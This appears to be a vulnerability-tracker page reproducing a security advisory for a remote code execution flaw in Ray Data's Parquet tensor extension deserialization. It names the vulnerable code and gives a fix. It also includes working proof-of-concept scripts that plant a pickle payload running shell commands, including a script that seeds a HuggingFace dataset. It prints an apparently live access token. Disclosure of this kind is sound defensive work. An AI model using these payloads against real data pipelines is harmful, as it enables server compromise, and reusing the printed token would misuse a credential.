Ray Data CVE-2026-41486
HIGHLifecycle Timeline
1DescriptionNVD
Remote Code Execution via Parquet Arrow Extension Type Deserialization
Summary
Ray Data registers custom Arrow extension types (ray.data.arrow_tensor, ray.data.arrow_tensor_v2, ray.data.arrow_variable_shaped_tensor) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls __arrow_ext_deserialize__ on the field's metadata bytes. Ray's implementation passes these bytes directly to cloudpickle.loads(), achieving arbitrary code execution during schema parsing, before any row data is read.
In May 2024, Ray fixed a related vulnerability in PyExtensionType-based extension types (issue #41314, PR #45084). In July 2025, PR #54831 introduced cloudpickle.loads() into the replacement extension types' deserialization path, reintroducing the same class of vulnerability.
Note: Source links in this report are pinned to the Ray 2.54.0 release commit (48bd1f8fa4) for stable line references. We also re-verified the same vulnerable code paths on current master as of March 17, 2026.
Details
Extension type registration
Ray Data registers three Arrow extension types globally in PyArrow:
# python/ray/data/_internal/tensor_extensions/arrow.py:1603-1605
pa.register_extension_type(ArrowTensorType((0,), pa.int64()))
pa.register_extension_type(ArrowTensorTypeV2((0,), pa.int64()))
pa.register_extension_type(ArrowVariableShapedTensorType(pa.int64(), 0))Registration happens at module load time (__init__.py:94-95), and any use of ray.data triggers it. Once registered, PyArrow automatically calls __arrow_ext_deserialize__ whenever it encounters these extension type names in any Parquet file's schema, including files from untrusted sources.
The code path to cloudpickle.loads()
All three extension types inherit from ArrowExtensionSerializeDeserializeCache, whose __arrow_ext_deserialize__ method (arrow.py:176-179) delegates to subclass methods that ultimately call _deserialize_with_fallback():
# python/ray/data/_internal/tensor_extensions/arrow.py:84-96
def _deserialize_with_fallback(serialized: bytes, field_name: str = "data"):
"""Deserialize data with cloudpickle first, fallback to JSON."""
try:
# Try cloudpickle first (new format)
return cloudpickle.loads(serialized)
# <-- arbitrary code execution
except Exception:
# Fallback to JSON format (legacy)
try:
return json.loads(serialized)
except json.JSONDecodeError:
raise ValueError(
f"Unable to deserialize {field_name} from {type(serialized)}"
)The serialized bytes come directly from the Parquet file's field-level metadata (ARROW:extension:metadata) with no validation. cloudpickle.loads() is tried first, meaning a crafted payload will always be executed before the safe JSON fallback is reached.
For ArrowTensorType, the call chain is:
__arrow_ext_deserialize__(cls, storage_type, serialized)
# arrow.py:176
-> _arrow_ext_deserialize_cache(serialized, value_type)
# arrow.py:178
-> _arrow_ext_deserialize_compute(serialized, value_type)
# arrow.py:652
-> _deserialize_with_fallback(serialized, "shape")
# arrow.py:653
-> cloudpickle.loads(serialized)
# arrow.py:88 RCEArrowTensorTypeV2 (arrow.py:679-680) and ArrowVariableShapedTensorType (arrow.py:1076-1077) follow the same pattern.
Why the existing mitigation doesn't help
After issue #41314, Ray added check_for_legacy_tensor_type() in parquet_datasource.py:146-170 to block the old PyExtensionType-based tensor types:
# python/ray/data/_internal/datasource/parquet_datasource.py:146-170
def check_for_legacy_tensor_type(schema):
"""Check for the legacy tensor extension type and raise an error if found.
Ray Data uses an extension type to represent tensors in Arrow tables. Previously,
the extension type extended `PyExtensionType`. However, this base type can expose
users to arbitrary code execution. To prevent this, we don't load the type by
default.
"""
for name, type in zip(schema.names, schema.types):
if isinstance(type, pa.UnknownExtensionType) and isinstance(
type, pa.PyExtensionType
):
raise RuntimeError(...)This guard checks for PyExtensionType / UnknownExtensionType. It does not check for the currently-registered ray.data.arrow_tensor types, which are the ones that call cloudpickle.loads(). Additionally, the check runs after PyArrow has already deserialized the schema, so even if it checked for the current types, the code execution would have already occurred.
Outside Ray's documented threat model
Ray's security documentation states that Ray relies on network isolation and "extensively uses cloudpickle." This vulnerability does not require cluster access. The payload arrives through a Parquet file from cloud storage, a data lake, HuggingFace, or a shared filesystem. A perfectly firewalled Ray cluster is vulnerable if it reads a crafted file.
Impact
- Affected versions: Ray 2.49.0 through 2.54.0 (latest release as of March 2026). The vulnerable
_deserialize_with_fallbackfunction withcloudpickle.loads()was introduced in commitf6d21db1a4(PR #54831, July 2025), first released in Ray 2.49.0. - Affected configurations: Any process that uses Ray Data and reads Parquet files. The extension types are registered globally in PyArrow, so all Parquet reads in the process are affected, including
ray.data.read_parquet(),pyarrow.parquet.read_table(),pandas.read_parquet(), etc. - Attacker prerequisites: The attacker must place a crafted Parquet file where a Ray Data pipeline reads it. No authentication or cluster access is required. The Parquet file must contain a column with a
ray.data.arrow_tensor(or v2, or variable-shaped) extension type name, which makes this a targeted attack against Ray Data users. - CIA impact: Arbitrary command execution as the Ray worker process user, resulting in full server compromise.
- Severity: Critical
Attack scenarios
- HuggingFace datasets: Ray's documentation recommends reading Parquet datasets from HuggingFace using
ray.data.read_parquet("hf://datasets/...", filesystem=HfFileSystem()). Anyone can create a HuggingFace dataset containing a crafted Parquet file. A tensor column withray.data.arrow_tensormetadata is normal for an ML dataset, as tensor columns are a core Ray Data feature. We verified this scenario end-to-end with a private HuggingFace dataset (see PoC below). - Multi-tenant ML platforms: Organizations running shared Ray clusters where multiple teams submit data processing jobs. If one team can write Parquet files to shared storage that another team reads, the writer can execute arbitrary code in the reader's context.
- Compromised data pipelines: An upstream data producer writes Parquet files with crafted tensor column metadata. The payload survives because standard Parquet tools preserve extension metadata transparently.
PoC
We provide two reproductions: a minimal local PoC and a full end-to-end scenario via HuggingFace.
Prerequisites: Python 3.12+ and uv (curl -LsSf https://astral.sh/uv/install.sh | sh).
PoC 1: Local file
Creates a valid Parquet file with a tensor column whose extension metadata contains a crafted cloudpickle payload. Reading the file with Ray Data triggers code execution during schema parsing.
1. Create the Parquet file:
cat > craft_parquet.py << 'SCRIPT'
import cloudpickle
import pyarrow as pa
import pyarrow.parquet as pq
COMMAND = "id > /tmp/ray-tensor-rce-proof"
class Trigger:
def __reduce__(self):
return (eval, (f"(__import__('os').system({COMMAND!r}), (1,))[1]",))
storage_type = pa.list_(pa.int64())
schema = pa.schema([
pa.field("tensor", storage_type, metadata={
b"ARROW:extension:name": b"ray.data.arrow_tensor",
b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
}),
pa.field("id", pa.int64()),
pa.field("text", pa.string()),
])
table = pa.Table.from_arrays([
pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
pa.array([1, 2]),
pa.array(["hello", "world"]),
], schema=schema)
pq.write_table(table, "crafted.parquet")
print("Created crafted.parquet")
SCRIPT
uv run --with 'cloudpickle,pyarrow' python craft_parquet.py2. Read it with Ray Data:
rm -f /tmp/ray-tensor-rce-proof
uv run --with 'ray[data]' python -c "
import ray.data
ray.data.read_parquet('crafted.parquet')
"
cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' - confirms code executionPoC 2: End-to-end via HuggingFace
This demonstrates the realistic attack scenario: a crafted Parquet file hosted as a HuggingFace dataset, read by a Ray cluster following Ray's own documentation.
We uploaded a crafted Parquet file to a private HuggingFace dataset at antiproof/parquet-tensor-disclosure. The file looks like a normal ML dataset with tensor, id, and text columns. The read-only token below gives access.
Upload script (for reference, this is how we seeded the dataset):
cat > upload_dataset.py << 'SCRIPT'
# /// script
# requires-python = ">=3.10"
# dependencies = ["cloudpickle", "pyarrow", "huggingface_hub"]
# ///
"""Upload a crafted Parquet file to a HuggingFace dataset.
Prerequisites: huggingface-cli login (with a write token)
Usage: uv run upload_dataset.py <repo_id> <command>
"""
import sys, tempfile
from pathlib import Path
import cloudpickle, pyarrow as pa, pyarrow.parquet as pq
from huggingface_hub import HfApi
def build_parquet(output, command):
class Trigger:
def __reduce__(self):
return (eval, (f"(__import__('os').system({command!r}), (1,))[1]",))
storage_type = pa.list_(pa.int64())
schema = pa.schema([
pa.field("tensor", storage_type, metadata={
b"ARROW:extension:name": b"ray.data.arrow_tensor",
b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
}),
pa.field("id", pa.int64()),
pa.field("text", pa.string()),
])
table = pa.Table.from_arrays([
pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
pa.array([1, 2]),
pa.array(["hello", "world"]),
], schema=schema)
pq.write_table(table, str(output))
repo_id, command = sys.argv[1], sys.argv[2]
with tempfile.TemporaryDirectory() as tmpdir:
parquet = Path(tmpdir) / "train.parquet"
build_parquet(parquet, command)
HfApi().upload_file(
path_or_fileobj=str(parquet),
path_in_repo="data/train.parquet",
repo_id=repo_id, repo_type="dataset",
)
print(f"Uploaded to https://huggingface.co/datasets/{repo_id}")
SCRIPT
# We ran:
# uv run upload_dataset.py antiproof/parquet-tensor-disclosure 'id > /tmp/ray-tensor-rce-proof'Reproduce (reads the dataset from HuggingFace, no local files needed):
rm -f /tmp/ray-tensor-rce-proof
HF_TOKEN=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 \
uv run --with 'ray[data],huggingface_hub' python -c "
import ray.data
from huggingface_hub import HfFileSystem
ray.data.read_parquet(
'hf://datasets/antiproof/parquet-tensor-disclosure/data/train.parquet',
filesystem=HfFileSystem(),
)
"
cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' - confirms code execution via HuggingFace datasetThe token above is read-only. The dataset is private to prevent unintended exposure.
Suggested fix
The extension metadata stores simple values (a shape tuple like (3, 224, 224) or an ndim integer). These do not require cloudpickle.
- Replace
cloudpickle.loads()in_deserialize_with_fallback()withjson.loads(). The tensor shape and ndim are JSON-serializable. For backward compatibility with files written using the current cloudpickle format, gatecloudpickle.loads()behind an opt-in environment variable (following the pattern already established withRAY_DATA_AUTOLOAD_PYEXTENSIONTYPE). - Serialize new extension type metadata as JSON by default.
json.dumps([3, 224, 224])carries the same information ascloudpickle.dumps((3, 224, 224)), without the code execution risk. - Add a security note to
read_parquet()documentation explaining that Parquet files from untrusted sources can execute arbitrary code when tensor extension types are registered.
Please contact [email protected] with any questions about this disclosure policy or related security research.
AnalysisAI
Remote code execution in Ray Data 2.49.0-2.54.0 allows attackers to execute arbitrary Python code by crafting malicious Parquet files containing Ray tensor extension types. When Ray Data reads these files, it deserializes untrusted metadata using cloudpickle.loads() without validation, triggering code execution during schema parsing before any data is read. …
Sign in for full analysis, threat intelligence, and remediation guidance.
RemediationAI
Within 24 hours: Identify all systems running Ray Data 2.49.0-2.54.0 using pip show ray and inventory which versions are in production or development. Within 7 days: Upgrade to Ray Data 2.55.0 or later once available from vendor, or implement immediate network isolation of Ray clusters and disable Parquet ingestion from untrusted sources. …
Sign in for detailed remediation steps.
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-mw35-8rx3-xf9r